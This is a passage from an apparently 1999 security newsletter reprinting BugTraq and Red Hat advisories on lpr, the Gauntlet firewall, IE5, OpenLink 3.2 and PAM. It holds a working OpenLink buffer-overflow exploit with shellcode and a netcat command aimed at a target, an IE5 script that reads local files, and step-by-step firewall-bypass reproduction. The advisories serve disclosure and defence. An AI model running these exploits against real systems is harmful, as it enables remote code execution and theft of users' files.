        ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm
      
      Red Hat Linux 5.x:
      
      Intel:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
      
      Alpha:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
      
      Sparc:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
      
      Source packages:
        ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm
      
      Red Hat Linux 6.x:
      
      Intel:
        ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
      
      Alpha:
        ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
      
      Sparc:
        ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
      
      Source packages:
        ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm
      
      7. Problem description:
      
      There are two problems in the lpr and lpd programs. By
      exploiting a race between the access check and the actual
      file opening, it is potentially possible to have lpr read
      a file as root that the user does not have access to. Also,
      the lpd program would blindly open queue files as root; by
      use of the '-s' flag to lpr, it was possible to have lpd print
      files that the user could not access.
      
      Thanks go to Tymm Twillman for pointing out these
      vulnerabilities.
      
      Also, various bugs in remote printing that were present
      in the lpd released with Red Hat Linux 6.1 have been fixed.
      
      8. Solution:
      
      For each RPM for your particular architecture, run:
      
      rpm -Uvh 
      
      where filename is the name of the RPM.
      
      9. Verification:
      
      MD5 sum                           Package Name
      --------------------------------------------------------------------------
      fb854cbddc9e38847c31aa6e07904ae6  lpr-0.43-0.4.2.i386.rpm
      10d7f947c5e1e2ac13c88fec95e53838  lpr-0.43-0.4.2.alpha.rpm
      aea5f8564289be2f344169ba89da5ff7  lpr-0.43-0.4.2.sparc.rpm
      faaa81630ac3d5de295deec4c0cb2883  lpr-0.43-0.4.2.src.rpm
      
      39dddd66751ae7e8e5b6fc179d61dd88  lpr-0.43-0.5.2.i386.rpm
      479537d92946838857276967d6fb4e98  lpr-0.43-0.5.2.alpha.rpm
      b8c3970d327b1bdd3c14b933b4dab5c0  lpr-0.43-0.5.2.sparc.rpm
      3aa3386da05e96adc04db5b376f307dd  lpr-0.43-0.5.2.src.rpm
      
      cc1f97635c0a1029febc1f0e75e40527  lpr-0.43-2.i386.rpm
      9c611726e6ec6f754e0b6503f87b8e97  lpr-0.43-2.alpha.rpm
      1e8ff6f9f3272f30ca96f4dcdfdc9b53  lpr-0.43-2.sparc.rpm
      2c258e8aa98f5b005b326f3110410965  lpr-0.43-2.src.rpm
      
      These packages are signed with GnuPG by Red Hat Inc. for security. Our key
      is available at:
      
      http://www.redhat.com/corp/contact.html
      You can verify each package with the following command:
      
      rpm --checksig  
      
      If you only wish to verify that each package has not been corrupted or
      tampered with, examine only the md5sum with the following command:
      
      rpm --checksig --nogpg 
      
      Note that you need RPM >= 3.0 to check GnuPG keys.
      
      10. References:
      
      @HWA        
      
73.0  Gauntlet Firewall Rules Bypass Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
      
      bugtraq id  721
      class       Design Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       Yes
      published   October 18, 1999
      updated     October 18, 1999
      
      vulnerable
      
              Network Associates Gauntlet Firewall 5.0
              
      It may be possible to violate all firewall rules if certain conditions are met
      when Gauntlet Firewall 5.0 is installed on the BSDI platform with a
      specific configuration. The following things need to happen in the order
      listed below for Gauntlet to be exploitable:
     
      1) Install BSDI 3.1 
     
      2) Install Gauntlet 5.0 
     
      3) Install BSDI patch M310-049 
     
      4) Install Gauntlet 5.0 kernel patch level 2
     
      5) Remove any proxy settings on client machine.
     
      6) Set the default route on the client machine and attempt to connect to
      any host through a normal tcp connection.
     
      This problem surfaces when connections are made through any
      adaptive proxy, "old" proxy or no proxy at all. In order to exploit this, a
      route will need to be specified since NAT will not occur when data is sent
      through the affected firewall. 
     
      None of the connections that ignore the rules are logged in
      /var/log/messages.
     
      Keith Young describes how to replicate the problem (this is taken
      directly from his bugtraq post):
     
     
      1) Install BSDI 3.1, March 1998. Use automatic install, however you may
      install minimal packages if you wish.
      2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
      3) Install Gauntlet 5.0.
      4) Reboot after installation.
      5) Login as root. 
      6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
      external and internal interfaces. If necessary, configure ESPM hosts,
      DNS settings, and admin
      users.
      7) Quit gauntlet-admin, save changes, and rebuild.
      8) After proxies have reconfigured, reboot machine.
      9) Since M310-049 is required for Gauntlet kernel patch install, and
      M310-046 is required for M310-049 installation, download both from
      ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/
      File info:
      M310-046 1194 Kb Wed Oct 14 00:00:00 1998
      M310-049 116 Kb Wed Dec 16 00:00:00 1998
      Both patches are considered "OK" by the Gauntlet support site:
      http://www.tis.com/support/bsd31.html
     
      10) Bring machine to single-user mode by executing "kill -term 1".
      11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
      12) Execute "perl5 M310-049 apply" to install IP DoS fix.
      13) Execute "cd /sys/compile/GAUNTLET-V50/".
      14) Build new kernel as required by M310-049 IP DoS kernel fix. 
      # make clean
      # make depend
      # make
      15) After kernel is rebuilt, reboot machine.
      16) Download Gauntlet 5.0 kernel and cluster patch:
      File info:
      cluster.BSDI.patch 12623 Kb Wed Sep 01 19:33:00 1999
      kernel.BSDI.patch 414 Kb Wed Aug 04 17:54:00 1999
      17) As noted in patch install directions, execute the following:
      # sh ./cluster.BSDI.patch
      # sh ./kernel.BSDI.patch
      # cd kernel.BSDI.patch
      # sh ./apply
      # cd ../cluster.BSDI.patch
      # sh ./apply
      18) After patches are installed, reboot machine.
      19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client
      machine to trusted network group. Apply changes.
     
      20) Start web browser on client machine. Set web proxy setting to
      internal interface of firewall. Attempt to connect to external web server.
      Access is allowed. *This is correct.*
     
      20) Remove http-gw from trusted network services. Apply changes.
      Attempt to connect to external web server. Access is denied. *This is
      correct.*
     
      ==Problem starts here==
     
      21) Remove proxy setting in web browser on client machine. Set
      gateway/default route on client machine to internal interface of firewall.
      Set gateway/default
      route on server machine to external interface of firewall.
     
      22) Clear web browser cache. Attempt to connect to external web
      server.
      Web page is downloaded with no logs in Gauntlet.
     
      23) Start ESPM-GUI. Remove all services from trusted networks
      services.
      Remove client machine from ESPM network group. Apply changes.
     
      24) FTP from client machine to server. FTP connection is made though
      no
      rule exists.
     
      25) Start telnet server on client machine. Telnet from server to client.
      Telnet connection is made.  
      
      Network Associates has released a patch for this problem. Contact the
      vendor for more information.      
      
      credit
      First posted to BugTraq by Keith Young
      <kyoung@v-one.com> on October 18,
      1999.

      reference
       web page:
               Gauntlet Firewall Unix
               (Network Associates Inc.)
               http://http://www.nai.com/asp_set/products/tns/gauntletunix_intro.asp
               
       message:
               Gauntlet 5.0 BSDI warning
               (Keith Young <kyoung@v-one.com>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B47D4.32B1655C@v-one.com
               
      
       To: BugTraq
       Subject: Gauntlet 5.0 BSDI warning
       Date: Mon Oct 18 1999 00:16:20
       Author: Keith Young
       Message-ID: <380B47D4.32B1655C@v-one.com>
      
      
                      Security issue in Gauntlet 5.0 BSDI when
                      BSDI patches are installed in a specific order
                      by Keith Young
                      (kyoung@v-one.com)
                      -=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=-
      
      SYSTEM AFFECTED -
              Gauntlet 5.0 BSDI with latest Gauntlet patches
              Other Gauntlet 5.0 patched systems are not affected
              Unpatched Gauntlet 5.0 BSDI is not affected
      
      
      SYNOPSIS -
              Local trusted and remote non-trusted users with routes through firewall
      may
      bypass all Gauntlet security rules.
              No activity will appear in the /var/log/messages log file.
              Internal network scheme is exposed.
      
              This issue will appear if you do the following in sequence:
              1) Install BSDI 3.1
              2) Install Gauntlet 5.0
              3) Install BSDI patch M310-049
              4) Install Gauntlet 5.0 kernel patch level 2
      
      
      VENDOR CONTACT -
              Vendor has been contacted and trouble ticket assigned.
              Patch will be released soon.
      
      
      OTHER NOTES -
              A) Behavior occurs if connection is through any adaptive proxy
      (http-pdk), "old"
      proxy (http-gw) or no proxy at all (any TCP connection).
              B) Packets will not be NATed by firewall, so to be 100% successful, a
      route will need
      to be published to get to your internal network through your firewall.
              C) As mentioned, nothing is ever logged in /var/log/messages
              D) Adding NATs to Gauntlet does not change the packets.
      
      
      SOLUTIONS -
              A) Install M310-049 *before* installing Gauntlet 5.0.
              B) A vendor patch/fix/suggestion is coming.
              C) Workaround - **Neither myself, V-ONE, nor NAI is responsible for the
              correct/incorrect use of this.**
              **Doing this may adversely affect your system and may void tech
      support.**
                      (as root)
                      1) # cp /usr/local/sys.gauntlet/i386/OBJ/ip_input.o
      /usr/src/sys/i386/OBJ
                      2) # sh /usr/local/sys.gauntlet/build_kernel/build_kernel 50.1
                      3) # reboot
      
      
      HOW TO REPRODUCE -
      
              Network configuration:
      
              [client]====[firewall]====[WWW/FTP-server]
              (internal)                (external)
              Client/Server: either Win98 or RedHat Linux 6.0, P2-350, 128MB RAM
              Firewall: P2-350, 256MB RAM, 10GB hard drive, any BSDI-compatible NIC
      
              All network connections done via 10baseT crossover cables, however
      users can be
              across hubs or routers.
      
      Listed here are the exact steps needed to reproduce this problem.
      
      1) Install BSDI 3.1, March 1998. Use automatic install, however you may
      install
      minimal packages if you wish.
      2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
      3) Install Gauntlet 5.0.
      4) Reboot after installation.
      5) Login as root.
      6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
      external and internal
      interfaces. If necessary, configure ESPM hosts, DNS settings, and admin
      users.
      7) Quit gauntlet-admin, save changes, and rebuild.
      8) After proxies have reconfigured, reboot machine.
      9) Since M310-049 is required for Gauntlet kernel patch install, and
      M310-046 is required
      for M310-049 installation, download both from
      ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/
              File info:
              M310-046        1194 Kb    Wed Oct 14 00:00:00 1998
              M310-049        116 Kb     Wed Dec 16 00:00:00 1998
      Both patches are considered "OK" by the Gauntlet support site:
      http://www.tis.com/support/bsd31.html
      
      10) Bring machine to single-user mode by executing "kill -term 1".
      11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
      12) Execute "perl5 M310-049 apply" to install IP DoS fix.
      13) Execute "cd /sys/compile/GAUNTLET-V50/".
      14) Build new kernel as required by M310-049 IP DoS kernel fix.
              # make clean
              # make depend
              # make
      15) After kernel is rebuilt, reboot machine.
      16) Download Gauntlet 5.0 kernel and cluster patch:
              File info:
              cluster.BSDI.patch      12623 Kb    Wed Sep 01 19:33:00 1999
              kernel.BSDI.patch       414 Kb      Wed Aug 04 17:54:00 1999
      17) As noted in patch install directions, execute the following:
              # sh ./cluster.BSDI.patch
              # sh ./kernel.BSDI.patch
              # cd kernel.BSDI.patch
              # sh ./apply
              # cd ../cluster.BSDI.patch
              # sh ./apply
      18) After patches are installed, reboot machine.
      19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client
      machine to
      trusted network group. Apply changes.
      20) Start web browser on client machine. Set web proxy setting to
      internal interface
      of firewall. Attempt to connect to external web server. Access is
      allowed. *This is
      correct.*
      20) Remove http-gw from trusted network services. Apply changes. Attempt
      to
      connect to external web server. Access is denied. *This is correct.*
      
      ==Problem starts here==
      
      21) Remove proxy setting in web browser on client machine. Set
      gateway/default route
      on client machine to internal interface of firewall. Set gateway/default
      route on
      server machine to external interface of firewall.
      22) Clear web browser cache. Attempt to connect to external web server.
      Web page
      is downloaded with no logs in Gauntlet.
      23) Start ESPM-GUI. Remove all services from trusted networks services.
      Remove client
      machine from ESPM network group. Apply changes.
      24) FTP from client machine to server. FTP connection is made though no
      rule exists.
      25) Start telnet server on client machine. Telnet from server to client.
      Telnet
      connection is made.
      
      @HWA        
      
74.0  Microsoft IE5 Javascript URL Redirection Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id   722
      class        Design Error
      cve          GENERIC-MAP-NOMATCH
      remote       Yes
      local        Unknown
      published    October 18, 1999
      updated      October 18, 1999
      
      vulnerable
      
              Microsoft Internet Explorer 5.0 for Windows NT 4.0
                 + Microsoft Windows NT 4.0
              Microsoft Internet Explorer 5.0 for Windows 98
                 + Microsoft Windows 98
              Microsoft Internet Explorer 5.0 for Windows 95
                 + Microsoft Windows 95
              Microsoft Internet Explorer 5.0 for Windows 2000
                 - Microsoft Windows NT 2000.0
              Microsoft Internet Explorer 4.0.1 for Windows NT 4.0
                 - Microsoft Windows NT 4.0
              Microsoft Internet Explorer 4.0.1 for Windows 98
                 - Microsoft Windows 98
              Microsoft Internet Explorer 4.0.1 for Windows 95
                 - Microsoft Windows 95       
                 
                 
      A malicious web site operator could design a web page that, when
      visited by an IE5 user, would read a local file from the victim host (or any
      file on the victim's network to which the victim has access) and send the
      contents of that file to a designated remote location.
     
      1) In the instance noted above, the IE5 user visits a malicious web site. 
     
      2) The web site instructs the client to open another IE5 browser window
      and display the contents of a file residing on the IE5 user's host (or
      another host on the network to which the IE5 user has access). 
     
      3) Immediately after opening the new browser window, the window is
      instructed to browse to a specified web site ie: http://malicious
      server.com/hack.cgi?doit. 
     
      4) The hack.cgi?doit page does not return a web page, but instead
      redirects the window to a javascript URL containing embedded
      executable code.
     
      5) The javascript code (from step 4) can now access any files on the
      victim's host (or any file on the victim's network to which the victim has
      access) and send it to a location maintained by the malicious web site
      operator.
     
      Under normal circumstances, javascript received from a non-local
      "security zone" is not allowed to perform such actions against files on
      the local host. In this instance, however, the IE5 browser has been
      fooled (via http redirect to javascript) into thinking that the Javascript
      should execute under the security context of the local host's security
      zone as the javascript was requested from a browser displaying the
      local file.
     
      Microsoft has released a FAQ that contains a good description of this
      vulnerability:
      http://www.microsoft.com/security/bulletins/MS99-043faq.asp           
      
      From Georgi's Bugtraq post:

      <SCRIPT>
      alert("Create a short text file C:\\TEST.TXT and it will be read and
      shown in a dialog box");
      a=window.open("file://c:/test.txt");
      a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
      </SCRIPT>
      // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect
      to: "javascript:alert(document.body.innerText)"

      A demonstration of this exploit is available at:

      http://www.nat.bg/~joro/jsredir1.html
      
      credit
      This vulnerabilty was posted to Bugtraq by Georgi Guninski
      <joro@nat.bg> on October 18, 1999.

      reference
       advisory:
               MS99-043: Workaround Available for
               "Javascript Redirect" Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1793
               
       message:
               IE 5.0 allows reading local (and from any
               domain) files and window spoofing usin
               (Georgi Guninski <joro@nat.bg>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B199A.3765A0D4@nat.bg
               
       web page:
               HTTP redirection to "javascript:"
               (Georgi Guninski <joro@nat.bg>)
               http://www.nat.bg/~joro/jsredir1.html
               
       web page:
               Microsoft Security Bulletin MS99-043:
               Frequently Asked Questions
               (Microsoft)
               http://www.securityfocus.com/vdb/Microsoft Security Bulletin MS99-043: Frequently Asked Questions
               
      
       To: BugTraq
       Subject: IE 5.0 allows reading local (and from any domain) files and window spoofing using HTTP redirection to "javascript:"
       Date: Mon Oct 18 1999 10:59:06
       Author: Georgi Guninski
       Message-ID: <380B199A.3765A0D4@nat.bg>
      
      
      IE 5.0 allows reading local (and from any domain) files and window
      spoofing using HTTP redirection to "javascript:"
      
      Disclaimer:
      The opinions expressed in this advisory and program are my own and not
      of any company.
      The usual standard disclaimer applies, especially the fact that Georgi
      Guninski
      is not liable for any damages caused by direct or  indirect use of the
      information or functionality provided by this program.
      Georgi Guninski, bears NO responsibility for content or misuse of this
      program or any derivatives thereof.
      
      Description:
      
      Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is
      vulnerable)
      allows reading local files and text/HTML files from any domain. Window
      spoofing is possible.
      It is also possible in some cases to read files behind fiewall.
      
      Details:
      
      The problem is a HTTP redirect to "javascript:" URLs.
      If you open a local file and the change its location to an URL that
      redirects to "javascript:JavaScript code"
      then the JavaScript code is executed in the security context of the
      original local file and has access to its DOM.
      The local file may be sent to an arbitrary server.
      In a similar way one may do window spoofing.
      This vulnerability may be exploited using HTML email message or a
      newsgroup posting.
      
      The code is:
      ----------------------------------------------------------------------------------------
      <SCRIPT>
      alert("Create a short text file C:\\TEST.TXT and it will be read and
      shown in a dialog box");
      a=window.open("file://c:/test.txt");
      a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
      </SCRIPT>
      // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP
      redirect to: "javascript:alert(document.body.innerText)"
      ----------------------------------------------------------------------------------------
      
      
      Workaround:
      Disable Active Scripting
      
      Demonstration is available at http://www.nat.bg/~joro/jsredir1.html
      
      Copyright 1999 Georgi Guninski
      
      Regards,
      Georgi Guninski
      http://www.nat.bg/~joro
      
      @HWA         
      
75.0  OpenLink 3.2 Remote Buffer Overflow Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  720
      class       Boundary Condition Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       No
      published   October 15, 1999
      updated     October 18, 1999
       
       vulnerable
       
              OpenLink Software OpenLink 3.2      
               
               
      Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable
      to a remotely exploitable buffer overflow attack. The problem is in their
      web configuration utility, and is the result of an unchecked strcpy() call.
      The consequence is the execution of arbitrary code on the target host
      (running the configuration utility) with the priviliges of the web software.
      
      Exploit:
      
      #include <stdio.h>
      #include <unistd.h>
      
      /*
       * Exploit for Openlink's web configurator for Linux/glibc2
       *  use: pipe through netcat to openlink web port (8000 default)
       *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
       *  makes www_sv execute /usr/bin/wall if you hit the address right
       *
       * For informational purposes only.  This was written to show that
       *  there's a problem, not for skr1pt k1dd33z --.
       *  don't ask me for help on how to use this to crack systems,
       *  help compiling or anything else.  It will only compile on
       *  an x86 compiler however.
       *
       * Addresses that work for me: 0xbffffb65 (initial run of the broker)
       *                             0xbffffb85 (all consecutive attempts)
       *                             probably tied to process ID www_sv runs as;
       *                             first try PIDs were in triple digits, others
       *                             4 digit PIDs.
       *
       * If this works, generally no more www_sv processes will be run as a side effect.
       */
      
      void test() {
      
      __asm__("
      
              jmp    doit
      exploit:
      
              # code basically from Aleph One's smash stacking article, with
              #  minor mods
      
              popl  %esi
              movb  $0xd0, %al            # Get a / character into %al
              xorb  $0xff, %al
              movb  %al, 0x1(%esi)        # drop /s into place
              movb  %al, 0x5(%esi)
              movb  %al, 0x9(%esi)
              xorl  %eax,%eax             # clear %eax
              movb  %eax,0xe(%esi)        # drop a 0 at end of string
              movl  %eax,0x13(%esi)       # drop NULL for environment
              leal  0x13(%esi),%edx       # point %edx to environment
              movl  %esi,0xf(%esi)        # drop pointer to argv
              leal  0xf(%esi),%ecx        # point %ecx to argv
              movl  %esi,%ebx             # point ebx to command - 1
              inc   %ebx                  # fix it to point to the right place
              movb  $0xb,%al              # index to execve syscall
              int   $0x80                 # execute it
              xorl  %ebx,%ebx            #  if exec failed, exit nicely...
              movl  %ebx,%eax
              inc   %eax
              int   $0x80
      doit:
              call exploit
              .string \"..usr.bin.wall.\"
      ");
      
      }
      
      char *shellcode = ((char *)test) + 3;
      
      char code[1000];
      
      int main(int argc, char *argv[])
      
      {
              int i;
              int left;
              unsigned char where[] = {"\0\0\0\0\0"} ;
              int *here;
              char *dummy;
              long addr;
      
      
              if (argc > 1)
                      addr = strtoul(argv[1], &dummy, 0);
              else
                      addr = 0xbffffb85;
      
              fprintf(stderr, "Setting address to %8x\n", addr);
      
              *((long *)where) = addr;
      
              strcpy(code, shellcode);
      
              for (i = 0; i < 64; i++) {
                      strcat(code, where);
              }
      
              printf("GET %s\n", code);
      
              exit(0);
      
      }
      
      Tymm Twillman suggested the following workaround in his post to
      BugTraq (linked to in the references section):

      Disable the www_sv application in oplrqb.ini. By default there is a
      section labeled Persistent Services, with the line
      "Configurator = www_sv". This section, along with the entire www_sv
      section, should be commented out with semicolons, e.g.

      ;[Persistent Services]
      ;Configurator = www_sv

      ;[www_sv]
      ;Program = w3config/www_sv
      ;Directory = w3config
      ;CommandLine =
      ;Environment = WWW_SV

      ;[Environment WWW_SV]

      OpenLink has been notified of this problem and is working on a fix.
      
      credit
      First posted to BugTraq by Tymm Twillman
      <tymm@coe.missouri.edu> on Oct 15, 1999.

      reference
       web page:
               OpenLink Homepage
               (OpenLink Software)
               http://www.openlinksw.com
       
       message:
               OpenLink 3.2 Advisory
               (Tymm Twillman <tymm@coe.missouri.edu>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.SGI.4.05.9910151747150.644081-100000@tiger.coe.missouri.edu
               
       
       To: BugTraq
       Subject: OpenLink 3.2 Advisory
       Date: Fri Oct 15 1999 05:37:36
       Author: Tymm Twillman
       Message-ID: <Pine.SGI.4.05.9910151747150.644081-100000@tiger.coe.missouri.edu>
      s
      
      Hmm.  I wonder if I should start numbering these things now. 8)
      
      Overview:
      
      A serious security hole has been found in the web configuration utility
      that comes with OpenLink 3.2.  This hole will allow remote users to
      execute arbitrary code as the user id under which the web configurator is
      run (inherited from the request broker, oplrqb).  The hole is a
      run-of-the-mill buffer overflow, due to lack of parameter checking when
      strcpy() is used.
      
      Background:
      
      OpenLink is a database request broker, used for a generic interface to
      different database vendors' products.  By default, a web configuration
      utility is installed, which runs at port 8000.  For more information, see
      OpenLink Software's web site at http://www.openlinksw.com.
      
      Exploit:
      
      This exploit has been coded to be benign, and is just for illustration of
      the hole in the configuration utility.  Furthermore, it has not been coded
      for portability (no promises that it will function if compiled with
      anything other than egcs-2.91.66, and it will not compile on a non-x86
      compiler).  This works against the linux glibc version of OpenLink 3.2's
      configurator.  It can easily be modified for other purposes, however, and
      I have reason to believe that the majority, if not all, platforms are
      vulnerable to such an attack.
      
      A stack address may be specified on the command line (I've had luck with
      0xbffffb65, 0xbffffb85 or 0xbffffbe5).  Output of this should be piped
      through netcat, e.g.
      
      ./oplwall 0xbffffb85 | nc machine.to.hit 8000
      
      --- cut ---
      #include <stdio.h>
      #include <unistd.h>
      
      /*
       * Exploit for Openlink's web configurator for Linux/glibc2
       *  use: pipe through netcat to openlink web port (8000 default)
       *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
       *  makes www_sv execute /usr/bin/wall if you hit the address right
       *
       * For informational purposes only.  This was written to show that
       *  there's a problem, not for skr1pt k1dd33z --.
       *  don't ask me for help on how to use this to crack systems,
       *  help compiling or anything else.  It will only compile on
       *  an x86 compiler however.
       *
       * Addresses that work for me: 0xbffffb65 (initial run of the broker)
       *                             0xbffffb85 (all consecutive attempts)
       *                             probably tied to process ID www_sv runs as;
       *                             first try PIDs were in triple digits, others
       *                             4 digit PIDs.
       *
       * If this works, generally no more www_sv processes will be run as a side effect.
       */
      
      void test() {
      
      __asm__("
      
              jmp    doit
      exploit:
      
              # code basically from Aleph One's smash stacking article, with
              #  minor mods
      
              popl  %esi
              movb  $0xd0, %al            # Get a / character into %al
              xorb  $0xff, %al
              movb  %al, 0x1(%esi)        # drop /s into place
              movb  %al, 0x5(%esi)
              movb  %al, 0x9(%esi)
              xorl  %eax,%eax             # clear %eax
              movb  %eax,0xe(%esi)        # drop a 0 at end of string
              movl  %eax,0x13(%esi)       # drop NULL for environment
              leal  0x13(%esi),%edx       # point %edx to environment
              movl  %esi,0xf(%esi)        # drop pointer to argv
              leal  0xf(%esi),%ecx        # point %ecx to argv
              movl  %esi,%ebx             # point ebx to command - 1
              inc   %ebx                  # fix it to point to the right place
              movb  $0xb,%al              # index to execve syscall
              int   $0x80                 # execute it
              xorl  %ebx,%ebx            #  if exec failed, exit nicely...
              movl  %ebx,%eax
              inc   %eax
              int   $0x80
      doit:
              call exploit
              .string \"..usr.bin.wall.\"
      ");
      
      }
      
      char *shellcode = ((char *)test) + 3;
      
      char code[1000];
      
      int main(int argc, char *argv[])
      
      {
              int i;
              int left;
              unsigned char where[] = {"\0\0\0\0\0"} ;
              int *here;
              char *dummy;
              long addr;
      
      
              if (argc > 1)
                      addr = strtoul(argv[1], &dummy, 0);
              else
                      addr = 0xbffffb85;
      
              fprintf(stderr, "Setting address to %8x\n", addr);
      
              *((long *)where) = addr;
      
              strcpy(code, shellcode);
      
              for (i = 0; i < 64; i++) {
                      strcat(code, where);
              }
      
              printf("GET %s\n", code);
      
              exit(0);
      
      }
      
      --- cut ---
      
      Workaround:
      
      Disable the www_sv application in oplrqb.ini.  By default there is a
      section labeled Persistent Services, with the line
      "Configurator = www_sv". This section, along with the entire www_sv
      section, should be commented out with semicolons, e.g.
      
      ;[Persistent Services]
      ;Configurator = www_sv
      
      ;[www_sv]
      ;Program     = w3config/www_sv
      ;Directory   = w3config
      ;CommandLine =
      ;Environment = WWW_SV
      
      ;[Environment WWW_SV]
      
      Discussion:
      
      OpenLink software has been notified of the problem is is apparently
      working on a solution.  I have serious concerns that the package may be
      prone to other attacks, but have no confirmation of this (other than basic
      DOS attacks). My suggestion is to definitely make sure any machine running
      the OpenLink broker is well protected behind a firewall, and it should not
      allow logins from untrusted persons.
      
      Kudos to:
      
      Aleph One, for his long-lived stack smashing article, and this
      whole BugTraq thing.
      
      Hobbit, of course, for netcat.
      
      -Tymm
      
      @HWA        
      
76.0  RedHat PAM NIS Locked Accounts Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      bugtraq id   697
      class        Access Validation Error
      cve          GENERIC-MAP-NOMATCH
      remote       No
      local        Yes
      published    October 13, 1999
      updated      October 13, 1999
      vulnerable   RedHat Linux 6.1
      
      not vulnerable
              RedHat Linux 6.0.0
              RedHat Linux 5.2.0
              RedHat Linux 5.1.0
              RedHat Linux 5.0.0
              
      Under some network configurations it may be possible to access locked
      NIS accounts due to a vulnerability in the PAM authentication modules
      shipped with RedHat version 6.1. This can lead to a local compromise
      where the password is known for a locked account. RedHat 6.1 for Intel
      platforms is the only vulnerable version.        
      
      The patched versions (binary and source) are available at the location
      below:

      ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm 

      ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm
      
      credit
      Exposed in RedHat advisory "RHSA-1999:040: New PAM
      packages available", published on Oct 13, 1999.

      reference
       advisory:
               RHSA-1999:040: New PAM packages available
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1789
               
               
       web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               
      
      RHSA-1999:040: New PAM packages available
      Published: Wed Oct 13 1999
      Updated: Wed Oct 13 1999 
      
      
      
      
      
         1. Topic: 
      
         Under some network configurations PAM (Pluggable Authentication
         Modules) will fail to lock access to disabled NIS accounts. 
      
         2. Problem description: 
      
         The PAM packages shipped with Red Hat Linux 6.1/Intel may allow access
         to locked NIS accounts on certain network configurations. If you have a Red
         Hat Linux 6.1 workstation performing authentication against a NIS server
         then you are at risk. Red Hat recommends that you upgrade the PAM
         packages on all Red Hat Linux 6.1 workstations to the versions announced in
         this advisory. 
      
         Previous versions of Red Hat Linux are not affected by this problem. 
      
         3. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info): 
      
         4. Relevant releases/architectures: 
         Red Hat Linux 6.1 for i386 
      
         5. Obsoleted by: 
         N/A 
      
         6. Conflicts with: 
         N/A 
      
         7. RPMs required: 
         ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm 
         ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm 
      
         8. Solution: 
      
         For each RPM for your particular architecture, run: 
      
         rpm -Uvh 
      
         where filename is the name of the RPM. 
      
         9. Verification: 
      
         MD5 sum                           Package Name
      
      
         9fd42c57d02ac039093b6f94132eee0e  SRPMS/pam-0.68-8.src.rpm
         e8d5b9edf5dc9998ee19d91b7620f2ad  i386/pam-0.68-8.i386.rpm
      
         These packages are GPG signed by Red Hat Inc. for security. Our key is
         available at: 
      
         http://www.redhat.com/corp/contact.html 
      
         You can verify each package with the following command: 
      
         rpm --checksig 
      
         If you only wish to verify that each package has not been corrupted or
         tampered with, examine only the md5sum with the following command: 
      
         rpm --checksig --nogpg 
      
         10. References: 
      
         Cristian 
      
         @HWA  
         
77.0  Microsoft IE5 IFRAME Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  696
      class       Access Validation Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes 
      local       No
      published   October 11, 1999
      updated     October 15, 1999
      
      vulnerable
      
              Microsoft Internet Explorer 5.0 for Windows NT 4.0
                 + Microsoft Windows NT 4.0
              Microsoft Internet Explorer 5.0 for Windows 98
                 + Microsoft Windows 98
              Microsoft Internet Explorer 5.0 for Windows 95
                 + Microsoft Windows 95
              Microsoft Internet Explorer 5.0 for Windows 2000
                 - Microsoft Windows NT 2000.0
              Microsoft Internet Explorer 4.0.1 for Windows NT 4.0
                 - Microsoft Windows NT 4.0
              Microsoft Internet Explorer 4.0.1 for Windows 98
                 - Microsoft Windows 98
